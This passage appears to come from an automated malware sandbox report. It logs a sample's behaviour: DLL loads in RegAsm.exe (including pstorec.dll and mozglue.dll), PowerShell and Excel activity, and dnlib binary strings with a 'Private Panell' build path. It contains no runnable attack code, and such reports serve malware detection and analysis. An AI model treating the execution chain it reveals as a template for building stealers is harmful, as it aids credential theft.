                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000D.00000002.514787395.0000000006370000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.512511300.00000000033C9000.00000004.00000800.00020000.00000000.sdmp
